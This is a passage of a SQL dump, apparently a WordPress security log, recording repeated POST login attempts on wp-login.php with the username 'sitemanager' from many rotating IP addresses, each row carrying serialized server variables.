TTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745479684.771704;s:12:\"REQUEST_TIME\";i:1745479684;}}','162.0.235.8',0,'2025-04-24 12:58:06','1970-01-01 00:00:00'),(94073,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"43304\";s:11:\"REMOTE_ADDR\";s:15:\"199.188.207.168\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745480049.4251871;s:12:\"REQUEST_TIME\";i:1745480049;}}','199.188.207.168',0,'2025-04-24 13:04:11','1970-01-01 00:00:00'),(94074,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"36384\";s:11:\"REMOTE_ADDR\";s:13:\"162.19.67.137\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745480419.1096699;s:12:\"REQUEST_TIME\";i:1745480419;}}','162.19.67.137',0,'2025-04-24 13:10:20','1970-01-01 00:00:00'),(94075,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"25366\";s:11:\"REMOTE_ADDR\";s:13:\"108.181.92.67\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745480824.074142;s:12:\"REQUEST_TIME\";i:1745480824;}}','108.181.92.67',0,'2025-04-24 13:17:05','1970-01-01 00:00:00'),(94076,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:15:\"HTTP_USER_AGENT\";s:135:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 Edg/115.0.1901.203\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"35696\";s:11:\"REMOTE_ADDR\";s:13:\"52.21.209.231\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745481234.500351;s:12:\"REQUEST_TIME\";i:1745481234;}}','52.21.209.231',0,'2025-04-24 13:23:56','1970-01-01 00:00:00'),(94077,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 Edg/114.0.1823.67\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53618\";s:11:\"REMOTE_ADDR\";s:14:\"198.54.119.106\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745481638.5392621;s:12:\"REQUEST_TIME\";i:1745481638;}}','198.54.119.106',0,'2025-04-24 13:30:40','1970-01-01 00:00:00'),(94078,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"45448\";s:11:\"REMOTE_ADDR\";s:11:\"89.28.217.3\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745482041.5952339;s:12:\"REQUEST_TIME\";i:1745482041;}}','89.28.217.3',0,'2025-04-24 13:37:23','1970-01-01 00:00:00'),(94079,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"el-GR,el;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"46626\";s:11:\"REMOTE_ADDR\";s:11:\"123.1.133.4\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745482441.5215421;s:12:\"REQUEST_TIME\";i:1745482441;}}','123.1.133.4',0,'2025-04-24 13:44:03','1970-01-01 00:00:00'),(94080,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"34590\";s:11:\"REMOTE_ADDR\";s:12:\"68.65.122.55\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745482844.588882;s:12:\"REQUEST_TIME\";i:1745482844;}}','68.65.122.55',0,'2025-04-24 13:50:46','1970-01-01 00:00:00'),(94081,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ro-RO,ro;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"32836\";s:11:\"REMOTE_ADDR\";s:15:\"104.219.248.236\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745483243.595257;s:12:\"REQUEST_TIME\";i:1745483243;}}','104.219.248.236',0,'2025-04-24 13:57:25','1970-01-01 00:00:00'),(94082,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:15:\"HTTP_USER_AGENT\";s:112:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"40764\";s:11:\"REMOTE_ADDR\";s:13:\"167.86.74.244\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745483643.137135;s:12:\"REQUEST_TIME\";i:1745483643;}}','167.86.74.244',0,'2025-04-24 14:04:04','1970-01-01 00:00:00'),(94083,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"es-ES,es;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 